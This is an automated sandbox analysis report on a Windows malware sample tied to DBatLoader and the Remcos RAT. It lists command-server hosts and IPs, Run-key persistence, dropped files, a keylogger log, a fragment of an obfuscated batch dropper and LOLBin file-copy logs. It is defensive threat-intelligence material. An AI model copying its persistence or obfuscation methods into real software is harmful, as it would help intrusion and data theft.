                                        http://www.pmail.com1m181Ru74o.exe, 1m181Ru74o.exe, 00000000.00000003.1296854371.000000000290C000.00000004.00000020.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1460211820.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1425970905.0000000002908000.00000004.00000020.00020000.00000000.sdmp, Ntmftfld.PIF, 0000000B.00000002.1550969058.0000000002FB2000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          https://aarzoomarine.com/owa1m181Ru74o.exe, 00000000.00000002.1424747239.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://ocsp.sectigo.com0C1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmp, 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            172.111.212.138
                                            craekuro.duckdns.orgUnited States
                                            20860IOMART-ASGBtrue
                                            103.101.59.23
                                            aarzoomarine.comIndia
                                            45117INPL-IN-APIshansNetworkINtrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1562867
                                            Start date and time:2024-11-26 08:12:11 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 10m 50s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:21
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:1m181Ru74o.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:050736376a0870aea56e2faf90ea34aa7af231c7b2d3d209bcac91628eec77c9.exe
                                            Detection:MAL
                                            Classification:mal100.rans.troj.spyw.evad.winEXE@20/11@5/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 74
                                            • Number of non-executed functions: 234
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            TimeTypeDescription
                                            02:13:07API Interceptor2x Sleep call for process: 1m181Ru74o.exe modified
                                            02:13:29API Interceptor2x Sleep call for process: Ntmftfld.PIF modified
                                            02:13:51API Interceptor5898237x Sleep call for process: SndVol.exe modified
                                            08:13:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ntmftfld C:\Users\Public\Ntmftfld.url
                                            08:13:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ntmftfld C:\Users\Public\Ntmftfld.url
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            aarzoomarine.comLisectAVT_2403002A_420.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 103.13.115.251
                                            Kqxdlqyd.PIF.exeGet hashmaliciousDBatLoaderBrowse
                                            • 103.13.115.251
                                            Kqxdlqyd.PIF.exeGet hashmaliciousDBatLoaderBrowse
                                            • 103.13.115.251
                                            HyMryFI2eP.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 103.13.115.251
                                            rRFQ096784.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 103.13.115.251
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            INPL-IN-APIshansNetworkINsora.arm.elfGet hashmaliciousUnknownBrowse
                                            • 111.125.250.236
                                            AMP4qOxnnc.elfGet hashmaliciousMiraiBrowse
                                            • 103.90.98.39
                                            huhu.arm-20240212-0910.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 103.90.98.25
                                            GHrwbsrdR8.elfGet hashmaliciousMiraiBrowse
                                            • 111.125.250.233
                                            skyljne.x86_64-20240109-1651.elfGet hashmaliciousMiraiBrowse
                                            • 103.90.98.50
                                            t6fSbo83L8.elfGet hashmaliciousMiraiBrowse
                                            • 103.90.97.220
                                            BWJ3Dpilxzevuv4T.dllGet hashmaliciousEmotetBrowse
                                            • 103.132.242.26
                                            BWJ3Dpilxzevuv4T.dllGet hashmaliciousEmotetBrowse
                                            • 103.132.242.26
                                            mirai.x86.elfGet hashmaliciousMiraiBrowse
                                            • 43.228.103.234
                                            VZlfpX97Uk.elfGet hashmaliciousMiraiBrowse
                                            • 103.90.98.34
                                            IOMART-ASGBfbot.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 188.227.187.51
                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                            • 176.56.207.19
                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 85.232.55.0
                                            x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 84.22.176.77
                                            https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.comGet hashmaliciousPhisherBrowse
                                            • 217.194.217.164
                                            x86.elfGet hashmaliciousMiraiBrowse
                                            • 193.37.77.239
                                            mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                            • 178.250.54.208
                                            75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                            • 178.250.54.208
                                            sora.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 37.220.28.60
                                            nklarm7.elfGet hashmaliciousUnknownBrowse
                                            • 37.220.16.83
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            a0e9f5d64349fb13191bc781f81f42e1nft438A5fN.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                            • 103.101.59.23
                                            6BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                                            • 103.101.59.23
                                            AnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                                            • 103.101.59.23
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 103.101.59.23
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 103.101.59.23
                                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                            • 103.101.59.23
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 103.101.59.23
                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                            • 103.101.59.23
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 103.101.59.23
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 103.101.59.23
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\Public\alpha.pifnft438A5fN.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                              RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                  USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                            x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                              TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                Process:C:\Windows\SysWOW64\SndVol.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):392
                                                                Entropy (8bit):3.309731221673357
                                                                Encrypted:false
                                                                SSDEEP:6:6lfXls5YcIeeDAl2i631gWA41GfE/OS/1gWAGfE/OSFWAv:6lt8ec8/3SWt/OSqWa/OSFW+
                                                                MD5:87AC6E8061FFF1C052E0E2FFE768813E
                                                                SHA1:94914C44970A48FFA9CE78AD23D56752CAE7D7AC
                                                                SHA-256:F1D964FFE3155DC3902E16CC91BCCACC3B24BE3D33F9CDB3DBB19D862FF8CE7E
                                                                SHA-512:B7F90ADABD4D8B532438692B02023B63FFD1E70B5E8A26ACE158D064FAE9A429469AA1D2157C141D20160862FA56920889E569D535F7BA88A74D3A1AACBB3012
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                Preview:....[.2.0.2.4./.1.1./.2.6. .0.2.:.1.3.:.1.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.V.o.l.u.m.e. .M.i.x.e.r.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                Process:C:\Users\user\Desktop\1m181Ru74o.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):790361
                                                                Entropy (8bit):7.385347980727179
                                                                Encrypted:false
                                                                SSDEEP:12288:wzsjIoL0tsnYkGOoyz+vzM2wUwWCWEKxYjVc81H7cNyXwwAZ6mzwhw5zT1g41Kly:Us13YVOoyzigGJxYe8lgNyz0d
                                                                MD5:53838C594C592447AEC53DF24B3F791E
                                                                SHA1:835FDACF7E25A50FA8D50A4A7EEADD7636AF9441
                                                                SHA-256:C571BD5C83C953F47F816B51340FA80FEA1C42A3BE86FE46BDBE6D09B90C3864
                                                                SHA-512:B42216326760646CB7300A0D1E634E6013637F32C713BC570E360073BD418290A99F44C3A134BBB7BEBF18BCB705361A1C6BCE7CBF281ACB3ACECF027E446D52
                                                                Malicious:true
                                                                Preview:...W!..I.%....#.%..!...$. ..%".%!..". .........% ....#......#...%.......... . ...........#.....!."...!..."...# .....W!..IW.............W!..I........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.........................>...R..7...............................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1566208
                                                                Entropy (8bit):7.004156501152886
                                                                Encrypted:false
                                                                SSDEEP:24576:RWGddPN4jN35Ohf8aT7JYR/MNPjWXY1Q7/VJJzsaz:RLLW15OOsYR/wjWXY1QZNz
                                                                MD5:06A72BA35AAFF1B3AB0EA4D3E2E65451
                                                                SHA1:656564A2AFC61D10E70D4833A0A57EF046709963
                                                                SHA-256:050736376A0870AEA56E2FAF90EA34AA7AF231C7B2D3D209BCAC91628EEC77C9
                                                                SHA-512:CFFAE7007D5B2A972F0F2E3FC044B6FB96A91B1D4609F575C113B8920DABB986E9709A3A599CD32D30B8681838CFF797B198E3A9FBB543B5622E36143AB9A79B
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@.............................. &...........................P...i...........................@......................,................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata.. &.......(..................@....tls....4....0...........................rdata.......@......................@..@.reloc...i...P...j..................@..B.rsrc................4..............@..@....................................@..@................................................................................................
                                                                Process:C:\Users\user\Desktop\1m181Ru74o.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4
                                                                Entropy (8bit):2.0
                                                                Encrypted:false
                                                                SSDEEP:3:z:z
                                                                MD5:E65F6D7F08D9245461E19A296FBEA585
                                                                SHA1:71CCBED1E7DC1F5A96E23C6CC44A8C113613A396
                                                                SHA-256:4C50D27C5031D7F039FE61DBD05B1E84B02D76786F79C569BE88AA04C95AA417
                                                                SHA-512:C0B4B359E61A98D8E0DC8197E59F4E541BE174C05B5455CB08C7AAA2E1453A0F3BB24F2147DD95E95D1D36C79091A3401ABB49A47EC973E9FE87E2399F8CF4CF
                                                                Malicious:false
                                                                Preview:49..
                                                                Process:C:\Users\user\Desktop\1m181Ru74o.exe
                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):62357
                                                                Entropy (8bit):4.705712327109906
                                                                Encrypted:false
                                                                SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                MD5:B87F096CBC25570329E2BB59FEE57580
                                                                SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                Malicious:false
                                                                Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                Process:C:\Users\user\Desktop\1m181Ru74o.exe
                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ntmftfld.PIF">), ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):104
                                                                Entropy (8bit):5.083162584502751
                                                                Encrypted:false
                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMRIDlPjvsbxzw:HRYFVmTWDyz2+lPTExzw
                                                                MD5:00B20EA3B89920289D00BBFED5F93925
                                                                SHA1:B2D420E9ED8ED0F59BAD3E1DF449EE5021CD57D5
                                                                SHA-256:CA681ABDE251C76FB4EE04A0BE65B52C871B553B0D73B3708DB8497DDA7A0F64
                                                                SHA-512:FF27EA7E7D110E1531798DAC72100EF0034572744B3853B9AE1204B5D0AC1C94E09100BBF1F9115146F8EF41B00A9CA1B26996DF51F5DC4A6E68ADBD5CD99E30
                                                                Malicious:true
                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Ntmftfld.PIF"..IconIndex=922662..HotKey=97..
                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):236544
                                                                Entropy (8bit):6.4416694948877025
                                                                Encrypted:false
                                                                SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: nft438A5fN.exe, Detection: malicious, Browse
                                                                • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                • Filename: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious, Browse
                                                                • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                • Filename: x.exe, Detection: malicious, Browse
                                                                • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):18944
                                                                Entropy (8bit):5.742964649637377
                                                                Encrypted:false
                                                                SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                Category:dropped
                                                                Size (bytes):590
                                                                Entropy (8bit):4.629489089285156
                                                                Encrypted:false
                                                                SSDEEP:12:q71j/xTz28imeSbZ7u0wxDDDDDDDDjCaY5dOMlaYAfTB8NGNd:y1j/xTz28Rp7u0wQakdO+a5t8Ny
                                                                MD5:7D3929C5A67E312C1F8844AEC4438918
                                                                SHA1:8CA674D1EFC50F67F6F68D2A9098BD5FBE95C8F6
                                                                SHA-256:E3D24E182D0888D5DF74D471AED8273C9CEEEA2F897144870BF8F36B5EB02B56
                                                                SHA-512:690064A06CEC7FC579C5A7536CD86FEB3772098641307FAB91C66EB5834996C0A1C60AAA3CEE997F4ED148AD5E2C62F40BD2788FF6E500F1F7FBD09948C25005
                                                                Malicious:false
                                                                Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\1m181Ru74o.exe...Destination File: C:\\Users\\Public\\Libraries\\Ntmftfld.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x17e600 (1566208) (1 MB)....Total bytes written = 0x17f000 (1568768) (1 MB).......Operation completed successfully in 0.140 seconds.....
                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                Category:dropped
                                                                Size (bytes):560
                                                                Entropy (8bit):4.532578488470501
                                                                Encrypted:false
                                                                SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
                                                                MD5:4D6C195EBA3736E57EF6A03F1EEEF490
                                                                SHA1:237210C613550627B46D6D6AB82F396EACA3EA20
                                                                SHA-256:FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
                                                                SHA-512:2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
                                                                Malicious:false
                                                                Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.004156501152886
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                • InstallShield setup (43055/19) 0.43%
                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                File name:1m181Ru74o.exe
                                                                File size:1'566'208 bytes
                                                                MD5:06a72ba35aaff1b3ab0ea4d3e2e65451
                                                                SHA1:656564a2afc61d10e70d4833a0a57ef046709963
                                                                SHA256:050736376a0870aea56e2faf90ea34aa7af231c7b2d3d209bcac91628eec77c9
                                                                SHA512:cffae7007d5b2a972f0f2e3fc044b6fb96a91b1d4609f575c113b8920dabb986e9709a3a599cd32d30b8681838cff797b198e3a9fbb543b5622e36143ab9a79b
                                                                SSDEEP:24576:RWGddPN4jN35Ohf8aT7JYR/MNPjWXY1Q7/VJJzsaz:RLLW15OOsYR/wjWXY1QZNz
                                                                TLSH:8575143E61E059A2D3B31471CF12A7E85E1D7A2E5AA0368766C0FE783BB7101DF35906
                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                Icon Hash:4b24191c2e0a3108
                                                                Entrypoint:0x4607bc
                                                                Entrypoint Section:.itext
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                DLL Characteristics:
                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:2f9e78edff3aa94d2509b054c2b17704
                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                add esp, FFFFFFF0h
                                                                mov eax, 0045F370h
                                                                call 00007F1B10967ECDh
                                                                mov eax, dword ptr [0046B964h]
                                                                mov eax, dword ptr [eax]
                                                                call 00007F1B109B6D6Dh
                                                                mov ecx, dword ptr [0046B724h]
                                                                mov eax, dword ptr [0046B964h]
                                                                mov eax, dword ptr [eax]
                                                                mov edx, dword ptr [0045EEA4h]
                                                                call 00007F1B109B6D6Dh
                                                                mov eax, dword ptr [0046B964h]
                                                                mov eax, dword ptr [eax]
                                                                call 00007F1B109B6DE1h
                                                                call 00007F1B10965C70h
                                                                lea eax, dword ptr [eax+00h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x700000x2620.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x10b200.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x750000x69dc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x740000x18.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x7072c0x5ec.idata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x5e5d00x5e6003a25bcf802d4669a519ae714f0d49a3eFalse0.5180437706953642data6.528324618369781IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
